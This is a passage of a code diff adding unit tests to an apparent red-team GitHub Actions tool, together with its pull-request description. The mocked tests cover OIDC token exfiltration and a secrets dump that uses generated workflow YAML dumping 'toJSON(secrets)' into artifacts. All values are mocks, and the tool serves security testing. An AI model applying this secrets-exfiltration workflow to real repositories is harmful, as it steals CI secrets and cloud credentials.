+        "files-production": {"oidc_token.txt": MOCK_JWT.encode()},
+        "files-staging": {"oidc_token.txt": MOCK_JWT_2.encode()},
+    }
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo",
+        None,
+        None,
+        False,
+        "oidc_exfil",
+        "sigstore",
+        environments=["production", "staging"],
+    )
+
+    captured = capsys.readouterr()
+    output = escape_ansi(captured.out)
+
+    assert MOCK_JWT in output
+    assert MOCK_JWT_2 in output
+    # Both environments appear in headers
+    assert "production" in output
+    assert "staging" in output
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil_environments_dedup(mock_api, capsys):
+    """Test OIDC exfil de-duplicates when two environments return the same token."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_repo_branch.return_value = 0
+    mock_api.return_value.get_recent_workflow.return_value = 11111111
+    mock_api.return_value.get_workflow_status.return_value = 1
+
+    mock_api.return_value.retrieve_all_workflow_artifacts.return_value = {
+        "files-production": {"oidc_token.txt": MOCK_JWT.encode()},
+        "files-staging": {"oidc_token.txt": MOCK_JWT.encode()},
+    }
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo",
+        None,
+        None,
+        False,
+        "oidc_exfil",
+        "sigstore",
+        environments=["production", "staging"],
+    )
+
+    captured = capsys.readouterr()
+    output = escape_ansi(captured.out)
+
+    # Same token — printed only once
+    assert output.count(MOCK_JWT) == 1

--- a/unit_test/test_secrets_attack.py
+++ b/unit_test/test_secrets_attack.py
@@ -42,7 +42,7 @@ def test_create_secret_exfil_yaml_environments():
     assert "matrix" in yaml_str
     assert "production" in yaml_str
     assert "staging" in yaml_str
-    assert "files-${{ matrix.environment }}" in yaml_str
+    assert "files-${{ matrix.safe_name }}" in yaml_str
     assert "environment: ${{ matrix.environment }}" in yaml_str
 
 

--- a/unit_test/test_secrets_attack.py
+++ b/unit_test/test_secrets_attack.py
@@ -27,6 +27,23 @@ def test_create_secret_exil_yaml():
 
     assert "${{ toJSON(secrets)}}" in yaml
     assert "actions/upload-artifact@v4" in yaml
+    assert "name: files\n" in yaml
+    assert "matrix" not in yaml
+
+
+def test_create_secret_exfil_yaml_environments():
+    """Test YAML generation includes a matrix when environments are provided."""
+    priv, pub = SecretsAttack._SecretsAttack__create_private_key()
+
+    yaml_str = SecretsAttack.create_exfil_yaml(
+        pub, "evilBranch", ["production", "staging"]
+    )
+
+    assert "matrix" in yaml_str
+    assert "production" in yaml_str
+    assert "staging" in yaml_str
+    assert "files-${{ matrix.environment }}" in yaml_str
+    assert "environment: ${{ matrix.environment }}" in yaml_str
 
 
 @patch(
@@ -198,3 +215,68 @@ async def test_secrets_dump_branchfail(mock_api, capsys):
     print_output = captured.out
 
     assert "Failed to check for remote branch!" in escape_ansi(print_output)
+
+
+@patch(
+    "gatox.attack.secrets.secrets_attack.SecretsAttack._SecretsAttack__decrypt_secrets"
+)
+@patch(
+    "gatox.attack.secrets.secrets_attack.SecretsAttack._SecretsAttack__create_private_key"
+)
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_secrets_dump_environments(mock_api, mock_privkey, mock_dec, capsys):
+    """Test secrets dump with environment matrix de-duplicates results."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_secrets.return_value = [{"name": "TEST_SECRET"}]
+    mock_api.return_value.get_repo_org_secrets.return_value = []
+    mock_api.return_value.get_repo_branch.return_value = 0
+    mock_api.return_value.get_recent_workflow.return_value = 11111111
+    mock_api.return_value.get_workflow_status.return_value = 1
+
+    mock_priv = MagicMock()
+    mock_privkey.return_value = (mock_priv, "PUBKEY")
+
+    # prod and staging share SECRET_A; staging has an extra SECRET_B
+    mock_dec.side_effect = [
+        b'{"SECRET_A":"shared_value","SECRET_B":"staging_only"}',
+        b'{"SECRET_A":"shared_value"}',
+    ]
+
+    mock_api.return_value.retrieve_all_workflow_artifacts.return_value = {
+        "files-staging": {
+            "lookup.txt": b"key",
+            "output_updated.json": b"enc",
+        },
+        "files-production": {
+            "lookup.txt": b"key",
+            "output_updated.json": b"enc",
+        },
+    }
+
+    gh_attacker = SecretsAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.secrets_dump(
+        "targetRepo",
+        None,
+        None,
+        False,
+        "exfil",
+        environments=["staging", "production"],
+    )
+
+    captured = capsys.readouterr()
+    output = escape_ansi(captured.out)
+
+    assert "Decrypted and Decoded Secrets:" in output
+    # SECRET_A appears in both envs with the same value — shown only once
+    assert output.count("SECRET_A=shared_value") == 1
+    # SECRET_B is unique to staging
+    assert "SECRET_B=staging_only" in output


### PR DESCRIPTION
## Summary

This PR adds a feature to create a workflow that mints an OIDC token to allow offensive security practitioners to simulate attacks similar to the TeamPCP's Bitwarden CLI package poisoning.

## Type of change
- [ ] Bug fix
- [x] New feature
- [ ] Breaking change
- [ ] Other

## Testing

TBD

## Notes

<!-- Anything reviewers should know (security implications, breaking changes, etc.) -->

Closes #
